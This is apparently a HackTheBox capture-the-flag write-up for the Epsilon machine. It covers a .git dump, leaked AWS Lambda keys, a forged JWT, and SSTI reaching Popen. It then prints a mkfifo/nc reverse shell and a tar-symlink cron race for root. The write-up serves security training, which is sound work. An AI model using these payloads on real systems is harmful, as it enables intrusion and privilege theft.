Epsilon - HackTheBox
Epsilon Machine(
- Add epsilon.htb to hosts file.
- Runing Port Scan we get 3 open ports
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41
| http-git:
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Updating Tracking API # Please enter the commit message for...
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 403 Forbidden
5000/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-title: Costume Shop
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Port 80 is apache & port 5000 is running python application i.e costume shop.
- As shown in scan port 80 is 403 Forbidden & have a .git directory that also is 403. Files like .git/config & .git/HEAD are accessible. We will use GitTools tool to dump this git directory and extract cotent from this.
- Port 5000 web application have a login panel, default usernames & passwords doesn't work.
- Running ffuf on this application we get three directories
- visiting /track will welcome you as admin but moment you interact with it you will be redirected to login page like other pages, suggesting that session is being checked at server.
Foothold: Admin access by AWS leak & exploiting SSTI
- As for now we have nothing other than .git directory which often leak stuffs.
- Read gittools docs and you can dump the git directory using this command
./gitdumper.sh http://epsilon.htb/.git/ tmp_dir
- Now from this directory you can extract actual commits
./extractor.sh tmp_dir ./git
- Now you can read surce code and find that there are some AWS keys leaks & new endpoint.
session = Session(
endpoint_url='http://cloud.epsilong.htb') #this is a typo it's epsilon
aws_lambda = session.client('lambda')
- Accessing cloud.epsilon.htb will give you 403 in browser guess it's not accessible this way.
- Let's add these keys to our aws cli and we can access aws lambda from our terminal.
What is AWS LAMBDA? AWS lambda provides service to run your code on particular events or triggers. Mainly used in backend application to manage websites Official Link: CLick
run aws configure and add keys,region or manually paste keys in your ~/.aws/credentials & region in ~/.aws/config file.
You can learn more about aws lambda by aws lambda help it will give you all possible commands to run. One we will use is list-functions & get-function
aws lambda list-functions
and you will get following error:An error occurred (UnrecognizedClientException) when calling the ListFunctions operation: The security token included in the request is invalid
Guess it also need to specify endpoint url , needed to take help from walkthrough.
aws lambda list-functions --endpoint-url=http://cloud.epsilon.htb
Let's fetch costume_shop_v1 fucntion contents ,
aws lambda get-function --function-name=costume_shop_v1 --endpoint-url=http://cloud.epsilon.htb
It reveals Location of code, Download it and unzip the file you will get some more code.
import json
secret='RrXCv`mrNe!K!4+5`wYq' #apigateway authorization for CR-124
'''Beta release for tracking'''
def lambda_handler(event, context):
if id:
return {
'statusCode': 200,
'body': json.dumps(str(resp)) #dynamodb tracking for CR-342
return {
'statusCode': 500,
'body': json.dumps('Invalid Order ID')
return {
'statusCode': 500,
'body': json.dumps('Invalid Order ID')
- Basic lambda fucntion for order tracking but interesting thing is secret key.
- Now if you take a look on python source code of application
@app.route("/", methods=["GET","POST"])
def index():
if request.method=="POST":
if request.form['username']=="admin" and request.form['password']=="admin":
res = make_response()
return res,302
return render_template('index.html')
return render_template('index.html')
- It sets jwt token in cookie auth and there is a secret used to sign this cookie. This secret could be a potential secret for that and it doesn't hurt to try. Btw this admin:admin creds doesn't work.
- Let's create a jwt token in python
>>> import jwt
>>> secret='RrXCv`mrNe!K!4+5`wYq'
>>> token=jwt.encode({"username":"admin"},secret,algorithm="HS256")
>>> token
set Cookie auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.8JUBz8oy5DlaoSmr0ffLb_hrdSHl0iLMGz-Ece7VNtg in browser and you will have full access.
On order page you can place new orders and it reflect your input
- First thing comes to mind is to check for xss, and indeed it is vulnerable to HTML injection,& XSS but it's of no use as we are already admin and no one is interacting with it and it's self xss it's not getting stored anywhere.
by setting costume=glasses</p><h1>INJECTION</h1>
- As it is a python application and input is reflected SSTI(Server Side Template INjection) only thing that could be tested now, and ofcourse machine tag has it :)
- As expected
truns into Your order of "49" has been placed successfully.
Creating exploit:
- In python
will tell which class your current instance belongs to.costume={{ ''.__class__ }}
tells it's an string class. __mro__
is an attribute of a class which tells base/parent class of this class.costume={{ ''.__class__.__mro__ }}
will show- Now as we want to climb up to root object we will access it with
- Now we want to see how many subclasses are accessible through this root object
.costume={{ ''.__class__.__mro__[1].__subclasses__() }}
will return list of subclasses accessbile. - From this haystack of list we need to find the needle i.e popen module which will execute the command. Here that is at index of 389, used some find and replace trick in sublime.
costume={{ ''.__class__.__mro__[1].__subclasses__()[389]("id",shell=True,stdout=-1).communicate() }}
now through 389 we are accessing popen and providing it arguments to process.communicate()
is used to read output by interacting with process by sending data to stdin and reading from stdout or stderr.
- As now we have command executing we should get a shell and have a listener ready. I used this reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f
.Also needed to url encode only revshell part to make it work. Otherwise 500 server error.
Privilege Escaltion: Abusing tar symlink feature
After upgrading to a proper tty shell. We can enumerate a little bit & running pspy gives that there is a task running by root(uid=0) every minute
First i always place my ssh keys on machine for some reason my tty shell is sometime so laggy and bascically disgusting (not simple nc shell only tty shells).
Putting my public key as authorized keys on machine and i can ssh.
Let's read content of cron script /usr/bin/backup.sh
file=`date +%N`
/usr/bin/rm -rf /opt/backups/*
/usr/bin/tar -cvf "/opt/backups/$file.tar" /var/www/app/
sha1sum "/opt/backups/$file.tar" | cut -d ' ' -f1 > /opt/backups/checksum
sleep 5
check_file=`date +%N`
/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"
/usr/bin/rm -rf /opt/backups/*
- It creates tar archive of /var/www/app and place it in /opt/backups create a sha1 hash put in backups and then sleep for 5 seconds then make tar archive of both files and place it in /var/backups/web_backups then remove everything from /opt/backups
- Interesting thing to note here is that we have full write access on /opt/backups directory and second tar archiving follow symlinks (-h flag). symlinks are files which basically points to other files on system.
- Now what we can do is that in 5 second window we can replace checksum file with our symlink to /root directory or any root file e.g. /root/.ssh. We can't replace tar file as it has a unique name cretaed by date command and we can't guess that. we can work something out to get same name but replacing checksum is easier. Obviously running everything is impossile so this bash script wil do the work.
cd /opt/backups
rm -f checksum
ln -s /root ./checksum
- changing directory, remove current checksum file withoout any prompt "
" then create a symlink to /root with same file name then exit happily. - You can continously run this script or moment you see a tar archive in /opt/backups run this script obviously you will need two different panes for that.
- Download the latest or with slight large size tar archive from /var/backups/web_backups . In my case it was 77MB as it was whole /root directory you can point it to /root/.ssh(will be of same size in this case) and save your time.
- Download the newly created tar or just extract it there on machine and you will have your root keys
- Login as root
That was it we have root access and we have rooted epsilon machine.
Thank you for reading that and feedbacks are welcome:)
Twitter: Avinashkroy
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